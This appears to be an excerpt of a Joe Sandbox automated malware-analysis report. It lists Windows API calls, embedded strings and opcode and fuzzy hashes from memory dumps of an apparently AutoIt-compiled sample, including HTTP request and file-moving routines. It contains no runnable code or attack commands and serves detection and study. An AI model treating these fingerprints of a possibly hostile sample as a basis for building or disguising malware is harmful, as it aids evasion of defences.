                                                                          • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                          • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                          • String ID:
                                                                          • API String ID: 262282135-0
                                                                          • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                          • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                          • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                          • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                          • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                          • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                          • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                          • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$LongWindow
                                                                          • String ID:
                                                                          • API String ID: 312131281-0
                                                                          • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                          • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                          • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                          • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                          APIs
                                                                            • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                          • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                                          • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                                            • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                          Similarity
                                                                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                          • String ID:
                                                                          • API String ID: 3771399671-0
                                                                          • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                          • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                          • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                          • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                          • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                          Similarity
                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                          • String ID:
                                                                          • API String ID: 2156557900-0
                                                                          • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                          • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                          • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                          • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                          • API String ID: 0-1603158881
                                                                          • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                          • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                          • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                          • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                          APIs
                                                                          • CreateMenu.USER32 ref: 00448603
                                                                          • SetMenu.USER32(?,00000000), ref: 00448613
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                          • IsMenu.USER32(?), ref: 004486AB
                                                                          • CreatePopupMenu.USER32 ref: 004486B5
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                          • DrawMenuBar.USER32 ref: 004486F5
                                                                          Similarity
                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                          • String ID: 0
                                                                          • API String ID: 161812096-4108050209
                                                                          • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                          • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                          • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                          • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                          • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                          • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                          • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                          APIs
                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                          Similarity
                                                                          • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 978794511-0
                                                                          • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                          • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                          • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                          • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                          • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                          • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                          • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                          • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                          • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                          • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
Similarity
• API ID: _memmove$_memcmp
• String ID: '$\$h
• API String ID: 2205784470-1303700344
• Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
• Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
• Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
• Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
APIs
• VariantInit.OLEAUT32(00000000), ref: 0045EA56
• VariantCopy.OLEAUT32(00000000), ref: 0045EA60
• VariantClear.OLEAUT32 ref: 0045EA6D
• VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
• __swprintf.LIBCMT ref: 0045EC33
• VariantInit.OLEAUT32(00000000), ref: 0045ECEE
Strings
• %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
Similarity
• API ID: Variant$InitTime$ClearCopySystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d
• API String ID: 2441338619-1568723262
• Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
• Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
• Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
• Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
APIs
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
• Sleep.KERNEL32(0000000A), ref: 0042C67F
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
Strings
Similarity
• API ID: Interlocked$DecrementIncrement$Sleep
• String ID: @COM_EVENTOBJ
• API String ID: 327565842-2228938565
• Opcode ID: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
• Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
• Opcode Fuzzy Hash: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
• Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
APIs
• VariantClear.OLEAUT32(?), ref: 0047031B
• VariantClear.OLEAUT32(?), ref: 0047044F
• VariantInit.OLEAUT32(?), ref: 004704A3
• DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
• VariantClear.OLEAUT32(?), ref: 00470516
  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
• VariantCopy.OLEAUT32(?,?), ref: 0047057A
  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
• VariantClear.OLEAUT32(00000000), ref: 0047060D
Strings
Similarity
• API ID: Variant$Clear$Copy$CallDispFuncInit
• String ID: H
• API String ID: 3613100350-2852464175
• Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
• Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
• Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
• Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
• DestroyWindow.USER32(?), ref: 00426F50
• UnregisterHotKey.USER32(?), ref: 00426F77
• FreeLibrary.KERNEL32(?), ref: 0042701F
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
Strings
Similarity
• API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
• String ID: close all
• API String ID: 4174999648-3243417748
• Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
• Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
• Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
• Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
• HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
Similarity
• API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
• String ID:
• API String ID: 1291720006-3916222277
• Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
• Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
• Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
• Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
APIs
• GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
• IsMenu.USER32(?), ref: 0045FC5F
• CreatePopupMenu.USER32 ref: 0045FC97
• GetMenuItemCount.USER32(?), ref: 0045FCFD
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
Strings
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2
• API String ID: 93392585-3793063076
• Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
• Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
• Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
• Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
APIs
• SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
• VariantClear.OLEAUT32(?), ref: 00435320
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
• VariantClear.OLEAUT32(?), ref: 004353B3
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
Strings
Similarity
• API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
• String ID: crts
• API String ID: 586820018-3724388283
• Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
• Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
• lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
• MoveFileW.KERNEL32(?,?), ref: 0044BC3F
• _wcscat.LIBCMT ref: 0044BCAF
• _wcslen.LIBCMT ref: 0044BCBB
• _wcslen.LIBCMT ref: 0044BCD1
• SHFileOperationW.SHELL32(?), ref: 0044BD17
Strings
Similarity
• API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
• String ID: \*.*
• API String ID: 2326526234-1173974218
• Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
• Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
• Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
• Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
APIs
  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
• _wcslen.LIBCMT ref: 004335F2
• GetFileAttributesW.KERNEL32(?), ref: 0043361C
• GetLastError.KERNEL32 ref: 0043362B
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
• _wcsrchr.LIBCMT ref: 00433666
  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                          • String ID: \
                                                                          • API String ID: 321622961-2967466578
                                                                          • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                          • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                          • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                          • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                          • API String ID: 1038674560-2734436370
                                                                          • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                          • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                          • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                          • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                          • LoadStringW.USER32(00000000), ref: 00434060
                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                          • LoadStringW.USER32(00000000), ref: 00434078
                                                                          • _wprintf.LIBCMT ref: 004340A1
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                          Strings
                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                          • API String ID: 3648134473-3128320259
                                                                          • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                          • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                          • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                          • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                          • __lock.LIBCMT ref: 00417981
                                                                            • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                            • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                            • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                          • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                          • __lock.LIBCMT ref: 004179A2
                                                                          • ___addlocaleref.LIBCMT ref: 004179C0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                          • String ID: KERNEL32.DLL$pI
                                                                          • API String ID: 637971194-197072765
                                                                          • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                          • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                          • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                          • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$_malloc
                                                                          • String ID:
                                                                          • API String ID: 1938898002-0
